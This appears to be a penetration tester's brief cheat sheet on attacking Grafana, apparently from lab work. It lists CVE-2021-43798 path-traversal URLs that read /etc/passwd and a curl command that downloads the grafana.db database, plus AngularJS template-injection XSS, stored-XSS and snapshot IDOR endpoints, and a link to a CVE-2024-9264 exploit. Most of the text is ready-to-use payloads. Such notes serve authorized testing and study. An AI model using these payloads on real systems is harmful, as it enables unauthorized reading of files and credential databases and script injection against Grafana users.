What is Grafana? : Open-source analytics & dashboards w/ alerting.

grafna version.png

Default path for db: /var/lib/grafana/grafana.db

β€£

https://github.com/nollium/CVE-2024-9264 (v11)

πŸ“Œ CVE-2021-43798 β€” Directory Traversal (v8.0 - 8.3) Access local files via path traversal in plugin routes.

<http://target/public/plugins/alertlist/../../../../../../../../etc/passwd>

#try to download the database
curl '<http://data.vl:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db>' --path-as-is --output grafana.db

πŸ“Œ CVE-2020-11110 β€” Stored XSS via originalUrl Inject JS into snapshot β€” triggers when user clicks β€œOpen Original Dashboard”.

<http://target/api/snapshots>

πŸ“Œ CVE-2021-41174 β€” AngularJS XSS (Unauthenticated) Angular template injection in snapshot renders JS in browser.

<http://target/dashboard/snapshot/{{constructor.constructor('alert(1)')()}>}?orgId=1

πŸ“Œ CVE-2021-39226 β€” Snapshot IDOR / Deletion Snapshot key exposed β€” can be viewed or deleted (unauth with public_mode=true).

<http://target/api/snapshots/:key>